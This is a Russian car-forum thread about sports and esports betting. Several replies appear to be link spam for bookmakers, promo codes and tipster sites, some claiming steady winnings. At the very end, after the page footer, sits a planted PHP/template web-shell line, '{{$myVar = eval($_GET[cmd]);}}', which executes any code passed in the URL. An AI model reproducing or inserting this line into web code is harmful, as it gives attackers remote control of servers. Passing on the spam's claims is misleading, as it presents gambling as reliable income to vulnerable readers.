+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 12

Тема: Ставки


  1. #1
    Мимо проходил tatarin is on a distinguished road Аватар для tatarin
    Регистрация
    22.12.2018
    Откуда
    .......
    Машина
    ......
    Сообщений
    14

    Ставки

    Ребята, я по своей натуре азартный человек и поэтому люблю делать ставки на различные виды спорта. И не только ради денег, выигрыша, а и для морального удовольствия. И вот наткнулся на информацию на сайте о том, что сейчас набирают с каждым днем все большую популярность ставки на киберспорт https://gori11a.com/ . Но сам лично с таким еще в жизни не сталкивался. А что Вы думаете об этом деле?
    Последний раз редактировалось tatarin; 24.07.2019 в 19:22.

  2. #2
    Мимо проходил genka is on a distinguished road Аватар для genka
    Регистрация
    21.12.2018
    Откуда
    Россия
    Машина
    Golf
    Сообщений
    11
    Как по мне, то делать ставки на киберспорт еще более рискованней, чем на спорт. Так как в этом деле тяжело просчитать исход турниров, разработать свою схему просчитывания выигрышных турниров в целом.

  3. #3
    Мимо проходил martin is on a distinguished road Аватар для martin
    Регистрация
    22.12.2018
    Откуда
    World
    Машина
    Golf Alltrack
    Сообщений
    11
    Я не как не жаль не особо разбираюсь в ставках на киберспорт, но если верить тем же отзывам игроков в интернете, то на киберспорте можно вполне неплохо и поднимать деньги. Так что тут дело такое.

  4. #4
    Мимо проходил masik is on a distinguished road Аватар для masik
    Регистрация
    28.12.2018
    Откуда
    .
    Машина
    Golf 1
    Сообщений
    11
    Мне вот не нравятся такие ставки на киберспорт тем, что часто букмекеры ограничивают максимальные ставки, сами матчи могут затянуться на неопределенное время. Но зато и сами букмекерские конторы часто просчитываются и есть большие шансы выигрыша. Так что в этом деле есть как и плюсы, так и минусы.

  5. #5
    Мимо проходил Nikitoss is on a distinguished road Аватар для Nikitoss
    Регистрация
    21.07.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    36
    А вы знали, что многие букмекерские конторы при регистрации предлагают неплохие бонусы. Если нет, то вот здесь https://promokod.org.ru/ можете узнать об актуальных промокодах на сегодняшний день.

  6. #6
    Мимо проходил Masewrol is on a distinguished road Аватар для Masewrol
    Регистрация
    28.01.2019
    Откуда
    Россия
    Машина
    Gof 6
    Сообщений
    64
    Если честно, то я не увлекаюсь азартными играми, да и мне в этом деле не фартит. Может, потому что я невезучий, или не того букмекера выбрал, не знаю, но после первого провала я больше не рискую. И вам не советую.)

  7. #7
    Мимо проходил Nevron is on a distinguished road Аватар для Nevron
    Регистрация
    26.01.2019
    Откуда
    Россия.
    Машина
    GOLF R
    Сообщений
    56
    Мне кажется, что стоит попробовать, что вы теряете. Самое главное найти надежного, и легального букмекера, а то сейчас много развелось нелегальных контор, а там вы сами понимаете, выиграть не получится. Кстати, я и сам планирую начать делать ставки, на днях нашел на одном сайте мобильную версию Фонбет, пока здесь смотрю, что к чему, изучаю информацию http://rusbets.com/fonbet/mobilnaya-versiya-fonbet .

  8. #8
    Мимо проходил deera is on a distinguished road Аватар для deera
    Регистрация
    23.11.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    54
    Тоже люблю азартные игры и не столько ради денег, как просто хочется почувствовать те эмоции, драйв, адреналин. Так что рад, что удалось найти этих капперов https://best-kapper.ru/ и теперь у меня появилось гораздо больше шансов на выигрыш. На сайте собрано целый рейтинг, так что можете прочесть о них и выбрать себе помощников)

  9. #9
    Мимо проходил ruben is on a distinguished road Аватар для ruben
    Регистрация
    19.11.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    20
    Я лично очень хорошо поднимаю капусту на ставках, это конечно не ежедневно, но в месяц очень даже хорошо выходит, всё потому что появилась новейшая мобильная версия приложения БК Леон для Android и IOS для скачивания!

  10. #10
    Мимо проходил маня is on a distinguished road Аватар для маня
    Регистрация
    29.04.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    20
    В Париматч нравится бонусная система. В букмекерской конторе Париматч бонус https://parimatchclubb.com/bonusy кроме стандартного приветственного бонуса есть множество других временных акций и бонусов. Более подробно на сайте БК можно прочитать про все действующие акции и бонусы, их там очень много. Регистрация быстрая и простая, не надо никуда ходить.

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Ставки
    от Veron в разделе Курилка
    Ответов: 18
    Последнее сообщение: 29.04.2020, 13:42
  2. Ставки на спорт
    от Kurdt в разделе Курилка
    Ответов: 8
    Последнее сообщение: 05.04.2020, 00:36
  3. Ответов: 25
    Последнее сообщение: 16.06.2014, 14:50

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}